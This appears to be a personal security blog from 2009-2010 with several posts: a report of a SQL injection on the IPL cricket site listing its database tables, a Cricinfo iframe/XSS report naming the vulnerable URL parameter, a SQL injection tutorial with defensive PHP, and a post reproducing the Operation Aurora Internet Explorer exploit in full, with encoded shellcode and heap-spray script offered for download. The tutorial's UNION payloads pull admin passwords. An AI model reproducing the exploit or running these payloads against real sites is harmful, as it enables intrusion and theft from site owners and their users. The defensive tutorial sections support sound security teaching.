SHAHEE MIRZA

Sooner or later you have to wake up.

Vulnerability on IPL web portal.


Pentested result: http://www.iplt20.com
Date: 14/03/2010
Notify to admins: YES
Database Version: MySQL >=5
Name Of DataBase: ipl2010live
Total Tables: 83
Credit: Shahee Mirza
Greetings : Gazi Lenin, learned many things from his tweets :)
Note: I did not read or dump any data from that database.
——-

Only Table List here:

——————————————————————
fixtures
lm_data
lm_hotels
lm_rooms
lm_venues
players_workload
slideshow
tbl_accreditation
tbl_ads
tbl_article_video_keywords
tbl_background
tbl_bb_comments
tbl_bb_invites
tbl_bb_invites_data
tbl_bb_invites_text
tbl_bb_invites_tickets
tbl_bb_users
tbl_camerafan
tbl_cloud
tbl_coaching_staff
tbl_comments
tbl_contacts
tbl_dugout
tbl_features
tbl_feed_live_match
tbl_feed_match
tbl_feed_match_innings
tbl_feed_match_innings_ballbyball
tbl_feed_match_innings_batting
tbl_feed_match_innings_bowling
tbl_feed_match_teams
tbl_feed_match_teams_players
tbl_feed_match_umpire
tbl_feed_running
tbl_files
tbl_gallery
tbl_gallery_images
tbl_governingbody
tbl_home_gallery
tbl_homepage
tbl_interviews
tbl_iplteams
tbl_lm_friendinvites
tbl_main_panel_news
tbl_main_panel_now
tbl_main_panel_videos
tbl_master_slave
tbl_matches
tbl_news
tbl_pages
tbl_panel_left
tbl_player_profile
tbl_player_profile_new
tbl_player_stats
tbl_poll_results
tbl_polls_answer_options
tbl_polls_question
tbl_rating
tbl_rs_invites
tbl_rs_invites_text
tbl_teams
tbl_tickets
tbl_trivia
tbl_tv
tbl_user_subscription
tbl_venues
tbl_videos
tbl_wallpaper
tbl_weather
tbladminusers
tblsession
tbluserlogs
wp_commentmeta
wp_comments
wp_links
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_terms
wp_usermeta
wp_users
——————————————————————
******
Notification sent to info-iplt20 [at] iplt20.com
******

Operation Aurora- Used on Google to hack.



The buzz earlier this week was that the attack vector that let bad actors, presumably from China, into the networks of Google, Juniper, Adobe and some 29 other firms was an Internet Explorer zero day: a use-after-free vulnerability on an invalid pointer reference affecting IE 6, 7 and 8, but only used by attackers against IE 6 according to Microsoft. Per Microsoft’s Advisory 979352: “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.”

This attack got a name, “Operation Aurora”, and everyone wanted to know how it carried out successful attacks on corporations.

Ok, no more talk…. Here is the “EXPLOIT CODE”. :D

<html><script>var sc = unescape("
%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805
%uffe2%uffff%u3931%ud8db%u87d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2
%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53%u30d4%uda37%ud8d8%u3053
%ud9b2%u3081%udbb9%ud8d8%u213a%ub7b0%ud8b6%ub0d8%uaaad%ub5b4%u538c%ud49e%u0830%ud8da%u53d8
%ub230%u81d9%u9a30%ud8db%u3ad8%ub021%uebb4%ud8ea%uabb0%ubdb0%u8cb4%u9e53%u30d4%uda69%ud8d8
%u3053%ud9b2%u3081%udbfb%ud8d8%u213a%u3459%ud9d8%ud8d8%u0453%u1b59%ud858%ud8d8%ud8b2%uc2b2
%ub28b%u27d8%u9c8e%u18eb%u5898%udbe4%uadd8%u5121%u485e%ud8d8%u1fd8%udbdc%ub984%ubdf6%u9c1f
%udcdb%ubda0%ud8d8%u11eb%u8989%u8f8b%ueb89%u5318%u989e%u8630%ud8da%u5bd8%ud820%u5dd7%ud9a7
%ud8d8%ud8b2%ud8b2%udbb2%ud8b2%udab2%ud8b0%ud8d8%u8b18%u9e53%u30fc%udae5%ud8d8%u205b%ud727
%u865c%ud8d9%u51d8%ub89e%ud8b2%u2788%uf08e%u9e51%u53bc%u485e%ud8d8%u1fd8%udbdc%uba84%ubdf6
%u9c1f%udcdb%ubda0%ud8d8%ud8b2%ud8b2%udab2%ud8b2%ud8b2%ud8b0%ud8d8%u8b98%u9e53%u30fc%ud923
%ud8d8%u205b%ud727%uc45c%ud8d9%u51d8%u5c5e%ud8d8%u51d8%u5446%ud8d8%u53d8%ub89e%ud8b2%ud8b2
%ud8b2%u9e53%u88b8%u8e27%u1fe0%ua89e%ud8d8%ud8d8%u9e1f%ud8ac%ud8d8%u59d8%ud81f%ud8da%uebd8
%u5303%ubc86%ud8b2%u9e55%u88a8%ud8b0%ud8dc%u8fd8%uae27%u27b8%udc8e%u11eb%ud861%ud8dc%u58d8
%ud7a4%u4d27%ud4ac%ua458%u27d7%uacd8%u58dd%ud7ac%u4d27%u333a%u1b53%ud8f5%ud8dc%u5bd8%ud820
%udba7%u8651%ub2a8%u55d8%uac9e%u2788%ua8ae%u278f%u5c6e%ud8d8%u27d8%ue88e%u3359%udcd8%ud8d8
%u235b%ua7d8%u277d%ub8ae%u8e27%u27ec%u5c6e%ud8d8%u27d8%uec8e%u5e53%ud848%ud8d8%u4653%ud854
%ud8d8%udc1f%u84db%uf6b9%u8bbd%u8e27%u53f4%u5466%ud8d8%u53d8%u485e%ud8d8%u1fd8%udfdc%uba84
%ubdf6%u3459%ud9d8%ud8d8%u0453%ud8b0%ud8d9%u8bd8%
ud8b0%ud8d9%u8fd8%ud8b2%ud8b2%u8e27%u53c4
%ueb23%ueb18%u5903%ud834%ud8da%u53d8%u5b14%u8c20%ud0a5%uc451%u5bd9%udc18%u2b33%u1453%u0153
%u1b5b%uebc8%u8818%u8b89%u8888%u8888%u8888%u888f%u5388%ud09e%u2f30%ud8d8%u53d8%ue4a6%uec30
%ud8d9%u30d8%ud8ef%ud8d8%ubbb0%uafae%ub0d8%ub0ab%ub7bc%u538c%ud49e%u6e30%ud8d8%u51d8%ue49e
%u79bc%ud8dc%ud8d8%u7855%u27b8%u2727%ubdb2%uae27%u53e4%uc89e%u4230%ud8d8%uebd8%u8b03%u8b8b
%u278b%u3008%ud83d%ud8d8%u3459%ud9d8%ud8d8%u2453%u1f5b%u1fdc%ueadf%u49ac%u1fd4%udc9f%u51bb
%u9709%u9f1f%u78d0%u4fbd%u1f13%ud49f%u9889%ua762%u9f1f%ue6c8%u6ec5%u1fe1%ucc9f%ub160%uc30c
%u9f1f%u66c0%ubea7%u1f78%uc49f%u7124%u75ef%u9f1f%u40f8%uc8d2%ubc20%ue879%ud8d8%u53d8%ud498
%ua853%u75c4%ub053%u53d0%u512f%ubc8e%udcb2%u3081%ud87b%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0
%ubdab%u8caa%ude53%uca30%ud8d8%u53d8%ub230%u81dd%u5c30%ud8d8%u3ad8%ueb21%u8f27%u8e27%u58dc
%u30e0%ue058%uad31%u59c9%udda0%u4848%u4848%ud0ac%u2753%u538d%u5534%udd98%u3827%ue030%ud8d8
%u1bd8%ue058%u5830%u31e0%uc9ad%ua059%u48dd%u4848%uac48%ub03f%ud2d0%ud8d8%u9855%u27dd%u3038
%ud8cf%ud8d8%u301b%ud8c9%ud8d8%uc960%udcd9%u1a58%ud8d4%uda33%u1b80%u2130%u2727%u8327%udf1e
%u5160%ud987%u1fbe%udd9f%u3827%u8b1b%u0453%ub28b%ub098%uc8d8%ud8d8%u538f%uf89e%u5e30%u2727
%u8027%u891b%u538e%ue4ad%uac53%ua0f6%u2ddb%u538e%uf8ae%u2ddb%u11eb%u9991%udb75%ueb1d%ud703
%uc866%u0ee2%ud0ac%u1319%udbdf%u9802%u2933%uc7e3%u3fad%u5386%ufc86%u05db%u53be%u93d4%u8653
%udbc4%u5305%u53dc%u1ddb%u8673%u1b81%uc230%u2724%u6a27%u3a2a%u6a2c%ud7ee%u28cb%ua390%ueae5
%u49ac%u5dd4%u7707%ubb63%u0951%u8997%u6298%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb
%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342%ucd8b%ub0be
%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7
%ubcb9%ub2f6%ubfa8%u00d8");
var sss = Array(826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280,
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833,
728, 735, 756, 707, 280, 770, 322, 756, 707, 770, 721, 812, 728, 420, 427, 371, 350, 364,
350, 392, 392, 287, 224, 770, 301, 427, 770, 413, 224, 770, 427, 770, 322, 805, 819, 686,
805, 812, 798, 735, 770, 721, 280, 336, 448, 371, 350, 364, 350, 378, 399, 315, 805, 693,
322, 756, 707, 770, 721, 812, 728, 287, 413, 826, 679, 798, 224, 840, 427, 770, 707, 833,
224, 455, 798, 798, 679, 847, 280, 287, 413, 224, 714, 777, 798, 280, 826, 679, 798, 224,
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637,
735, 651, 427, 770, 301, 805, 693, 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ ){
  arr[i] = String.fromCharCode(sss[i]/7); } var cc=arr.toString();cc=cc.replace(/ ,/ g, ""
  );
  cc = cc.replace(/@/g, ",");
  eval(cc);
  var x1 = new Array();
  for (i = 0; i < 200; i ++ ){
    x1[i] = document.createElement("COMMENT");
    x1[i].data = "abc";
  }
  ;
  var e1 = null;
  function ev1(evt){
    e1 = document.createEventObject(evt);
    document.getElementById("sp1").innerHTML = "";
    window.setInterval(ev2, 50);
  }
  function ev2(){
    p = "
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d
\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
    for (i = 0; i < x1.length; i ++ ){
      x1[i].data = p;
    }
    ;
    var t = e1.srcElement;
  }
</script><span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)"></span></body></html>

Better if you download it from here.

Microsoft says:

“At this time, we are aware of limited, active attacks attempting to use this vulnerability against Internet Explorer 6. We have not seen attacks against other affected versions of Internet Explorer.”

Cricinfo.com iframe vulnerability.


00x01: Introduction

Cricinfo.com is the finest and most famous web portal for cricket. Cricinfo offers users the most comprehensive live coverage of international and domestic cricket available, as well as an unparalleled stats database and quality editorial comment and analysis, and it is part of ESPN. We get a lot of information from there. People like me, who have no television at home, keep an eye on it.

00x02: PoC

I have tried to inject an iframe into it. Proof of concept is below.

[Screenshot: cricinfo2]

00x03: Details

Vulnerable URL is below.

http://www.cricinfo.com/ci/engine/current/series/index.html?season=[iframe/xss]


00x04: Greetings

Red-D3v1L ## Who discovered the XSS vulnerability on “Cricinfo Games 1.0”.

00x05: Credit

SHAHEE MIRZA

SQL injection: attacks and defenses.

December 29, 2009 | Shahee Mirza | Security

***Introduction:

It is remarkable that attackers use several methods to get into restricted parts of web applications, and they are discovering new methods day by day.

But SQL injection is now the most widespread method of hacking your web sites or web apps.

So here is the question: what is SQL injection?

## SQL injection is a code injection technique that lets an attacker get sensitive information out of your database. It actually happens at the database layer. The vulnerability occurs in PHP and ASP scripts because of a mistake by their coder.

***Where and why this vulnerability happens:

## Your coder may forget, or be too lazy, to handle SQL query errors.

## Malicious users can insert SQL syntax into form requests.

## SQL syntax is not filtered out of the input.

## The type of the value placed into the SQL query string is not checked.

## This attack can be performed anywhere in your application; the attacker does not even need a privileged account.

## The attack can be performed via cookies.

## Dynamic pages that pull data directly from the database are exposed.

## The vulnerability may also be caused by your database server.

***Types of SQL injection:

There are two types of SQL injection.

1. Injection into variables that contain strings.

2. Injection into numeric variables.

They differ from each other. I will describe both, and also how to avoid them.

*** 1. Injection into the variables that contain strings.

## Vulnerable code:

OK, imagine that you wrote an application with a page that fetches a member’s credits according to his login name. The username is passed from one page to another via the URL, i.e. through $_GET['variable']:

$cred = $_GET['name']; // untrusted input, used as-is
$result = mysql_query("SELECT credit FROM user WHERE username='$cred'"); // vulnerable: the value is pasted into the SQL text

This script has a SQL injection vulnerability. An attacker can abuse it just by putting SQL beside the username in the URL:

' UNION SELECT password FROM admin WHERE id=1

This will pull the password of the admin user who has id number 1, as an example.

## Solution:

Avoiding this type of attack is very simple, and it has been described many times by many security experts. You have to use the function mysql_real_escape_string(). What does it do? mysql_real_escape_string() prepends a backslash ("\") to each of the following characters:

NUL (\x00), \n, \r, \, ', " and \x1a

So, look at that vulnerable code again, this time with mysql_real_escape_string():

$cred = mysql_real_escape_string($_GET['name']); // quotes and the other special characters are now escaped
$result = mysql_query("SELECT credit FROM user WHERE username='$cred'");

This query is now protected against that injection.

## Attack again:

Now suppose the attacker tries the same input as before:

' UNION SELECT password FROM admin WHERE id=1

After mysql_real_escape_string(), the query receives this instead:

\' UNION SELECT password FROM admin WHERE id=1

The "\" character was added by mysql_real_escape_string(), so the quote no longer closes the string literal and the whole input is treated as a username to look up.

Somebody will advise you to use the addslashes() function instead. But that function has some limitations.

## Please read these topics from the PHP manual:

http://www.php.net/manual/en/function.addslashes.php

and

http://www.php.net/manual/en/mysqli.real-escape-string.php

and also

http://www.php.net/manual/en/function.pg-escape-string.php

*** 2. Injection into numeric variables.

These types of SQL attacks are less known than the first one, and not so well described by security experts, but they bring the same disaster to your web applications.

## Vulnerable code:

Now it is time to describe this attack. Imagine again that you wrote a page that displays a user’s credit according to his user id. The user id is passed from one page to another via a form post, i.e. through $_POST['variable']:

$id = $_POST['id']; // untrusted input, used as-is
$result = mysql_query("SELECT credit FROM user WHERE id=$id"); // vulnerable: $id is not quoted, so escaping quotes would not help

In this situation mysql_real_escape_string() will not protect you from a SQL injection attack, because the $id variable is not quoted: it is expected to hold a numerical value, and the attacker needs no quote character at all. Now an attacker will use this type of SQL query:

2 UNION SELECT password FROM admin WHERE id=1

So how can you protect the web application from this attack? There are two things you can do.

1. You can convert the content to a number, so that your variable holds only numerical content.

2. You can check whether the content is numerical, and only then proceed to run the query.
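The following is an added example, not code from the original article, covering both injection classes described above: the quoted string variable from part 1 and the unquoted numeric variable from part 2. It runs against an in-memory SQLite database through PDO so that it executes offline without a MySQL server; the table and column names (user, admin, credit, password) follow the article, while the rows and the value 'constructed-secret' are constructed sample data. The hardened forms use prepared statements with bound parameters, which the article does not cover but which are the standard fix for both cases.

```php
<?php
// Added example, not code from the original article: the two injection
// classes the article describes (a quoted string variable and an unquoted
// numeric variable) run against an in-memory SQLite database through PDO, so
// it executes offline without MySQL. Table and column names (user, admin,
// credit, password) follow the article; the rows and the value
// 'constructed-secret' are constructed sample data.

function setup_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, credit TEXT)");
    $db->exec("CREATE TABLE admin (id INTEGER PRIMARY KEY, password TEXT)");
    $db->exec("INSERT INTO user VALUES (1, 'alice', '100'), (2, 'bob', '40')");
    $db->exec("INSERT INTO admin VALUES (1, 'constructed-secret')");
    return $db;
}

// Pattern 1 from the article: the string variable is interpolated inside
// quotes. Returned as text only, to show what the database would be asked
// to parse.
function build_string_query(string $name): string
{
    return "SELECT credit FROM user WHERE username='$name'";
}

// Pattern 2 from the article: the numeric variable is interpolated without
// quotes, so quote-escaping cannot help; the input needs no quote at all.
function credit_by_id_vulnerable(PDO $db, string $id): array
{
    $rows = $db->query("SELECT credit FROM user WHERE id=$id")->fetchAll(PDO::FETCH_COLUMN);
    return array_map('strval', $rows);
}

// Hardened form for the string case: a prepared statement with a bound
// parameter. The input travels as data and is never parsed as SQL.
function credit_by_name_safe(PDO $db, string $name): array
{
    $stmt = $db->prepare("SELECT credit FROM user WHERE username = ?");
    $stmt->execute([$name]);
    return array_map('strval', $stmt->fetchAll(PDO::FETCH_COLUMN));
}

// Hardened form for the numeric case: validate the type first (the
// article's "verify data types" rule), then bind the integer.
function credit_by_id_safe(PDO $db, string $id): ?array
{
    $clean = filter_var($id, FILTER_VALIDATE_INT);
    if ($clean === false) {
        return null; // reject; the caller should log the attempt
    }
    $stmt = $db->prepare("SELECT credit FROM user WHERE id = ?");
    $stmt->execute([$clean]);
    return array_map('strval', $stmt->fetchAll(PDO::FETCH_COLUMN));
}

$db = setup_db();
$stringPayload  = "' UNION SELECT password FROM admin WHERE id=1"; // the article's string payload
$numericPayload = "2 UNION SELECT password FROM admin WHERE id=1"; // the article's numeric payload

// 1. Vulnerable string pattern: the attacker's SQL has become part of the statement text.
echo build_string_query($stringPayload), "\n";

// 2. Parameterized string pattern: the payload is matched as a literal
//    username and finds no row.
var_dump(credit_by_name_safe($db, $stringPayload));

// 3. Vulnerable numeric pattern: the UNION runs and the result set carries
//    the admin password alongside bob's credit.
var_dump(in_array('constructed-secret', credit_by_id_vulnerable($db, $numericPayload), true));

// 4. Hardened numeric pattern: the payload fails integer validation, while a
//    genuine id is answered normally.
var_dump(credit_by_id_safe($db, $numericPayload));
var_dump(credit_by_id_safe($db, '2'));
```

Run it with `php` on the command line. The point of the two hardened functions is that the SQL text is fixed at prepare time and the input only ever fills a placeholder, so neither a quote character nor an unquoted number can change the statement; the integer check on the numeric path is what the article's intval()/is_numeric() advice achieves, done with a filter that rejects instead of silently coercing.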

## Solution:

To avoid this type of attack you can use these functions:

A. the intval() function

B. the is_numeric() function

Here I am describing the benefit of the intval() function.

$var = '7ack3r';      // variable contains alphanumerical content
$var2 = intval($var); // intval() keeps the leading digits and drops the rest
print $var2;          // this prints only 7

Now you can change your code as below.

$id = intval($_POST['id']); // anything after the leading integer is discarded
$result = mysql_query("SELECT credit FROM user WHERE id=$id");

Yes, that does the job. This protects your web application against this attack.

Now I am going to describe the function is_numeric(). This function checks whether your variable contains numerical content.

$id = $_POST['id'];

if (is_numeric($id))
{
    $result = mysql_query("SELECT credit FROM user WHERE id=$id");
}
else
{
    log_the_attack(); // this function logs all the information, e.g. ip, browser, time, date etc.
    echo "Ha ha ha, trying do something with me dude? You are logged honey";
}

function log_the_attack()
{
    // record when the rejected input arrived, from which address and which browser
    $agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    error_log(sprintf("%s %s %s\n", date('Y-m-d H:i:s'), $_SERVER['REMOTE_ADDR'], $agent));
}

Here a question will arise: “What should I use now, intval() or is_numeric()?”

The answer is “It’s up to you. intval() is easy and saves coding time, but is_numeric() may cost some time; in return it lets you keep a log of all the attack attempts”.
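As an added example, not code from the original article, the block below puts the two checks discussed here side by side on edge-case inputs, together with filter_var(FILTER_VALIDATE_INT), which accepts only a plain integer, and a strict version of the is_numeric() branch that records what the article's log_the_attack() stub was meant to record. The sample inputs, the $server array (with the TEST-NET address 203.0.113.7) and the log line format are this example's own constructions.

```php
<?php
// Added example, not code from the original article: how intval(),
// is_numeric() and filter_var(..., FILTER_VALIDATE_INT) treat edge-case
// inputs for a user id, plus a strict replacement for the article's
// is_numeric() branch that logs what log_the_attack() was meant to record.
// The sample inputs and the $server array are constructed; the log line
// format is this example's own choice.

function classify_id(string $input): array
{
    return [
        'input'      => $input,
        // intval() coerces: it reads the leading digits and never rejects anything.
        'intval'     => intval($input),
        // is_numeric() also accepts decimals, exponents and leading whitespace.
        'is_numeric' => is_numeric($input),
        // FILTER_VALIDATE_INT returns the integer, or false for anything else.
        'validated'  => filter_var($input, FILTER_VALIDATE_INT),
    ];
}

// Strict form of the article's check: accept only a positive integer id;
// otherwise record ip, browser and time (as the article's comment describes)
// and return null so that no query is built at all.
function user_id_or_log(string $input, array $server): ?int
{
    $id = filter_var($input, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id !== false) {
        return $id;
    }
    error_log(sprintf(
        '[%s] rejected id %s from %s (%s)',
        date('c'),
        json_encode($input),
        $server['REMOTE_ADDR'] ?? '-',
        $server['HTTP_USER_AGENT'] ?? '-'
    ));
    return null;
}

// Constructed inputs: a normal id, the article's '7ack3r' example, the
// article's numeric payload, and forms that is_numeric() accepts but an
// integer id column should not.
$samples = [
    '7',
    '7ack3r',
    '2 UNION SELECT password FROM admin WHERE id=1',
    '2.5',
    '1e3',
    '0x1A',
    '-1',
];

printf("%-48s %8s %10s %10s\n", 'input', 'intval', 'is_numeric', 'validated');
foreach ($samples as $s) {
    $r = classify_id($s);
    printf(
        "%-48s %8d %10s %10s\n",
        $r['input'],
        $r['intval'],
        $r['is_numeric'] ? 'true' : 'false',
        $r['validated'] === false ? 'false' : (string) $r['validated']
    );
}

// Constructed request metadata; in a real handler this would be $_SERVER.
$server = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_USER_AGENT' => 'constructed-agent/1.0'];
var_dump(user_id_or_log('7', $server));
var_dump(user_id_or_log('2 UNION SELECT password FROM admin WHERE id=1', $server));
```

Two things the table makes visible: intval() turns the article's UNION payload into the number 2, so the query runs for user 2 and the attempt is never noticed, which is exactly the log entry the article wants to keep; and is_numeric() says true for '2.5' and '1e3', so it alone does not guarantee an integer. Validating with FILTER_VALIDATE_INT (with a minimum of 1 for an id) rejects all of these and still gives you the log line.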

Please read details from here:

1. http://www.php.net/manual/en/function.is-numeric.php

2. http://www.php.net/manual/en/function.intval.php

*** Conclusions:

Finally, to finish this article: if you follow these steps, your application will be secure.

## Verify the data types of all non-string user inputs.

## Escape all string inputs.

## Keep track of security violation attempts.

## Limit the SQL user’s rights.

## Take database backups.

## Double-check your code.

## Always keep your database server updated.

###################

I AM CONFESSING THAT I AM BAD IN ENGLISH.

IF I WROTE ANY WRONG INFORMATION IN MY ARTICLE, PLEASE INFORM ME.

###################

Hello world!


Welcome to my site. :-)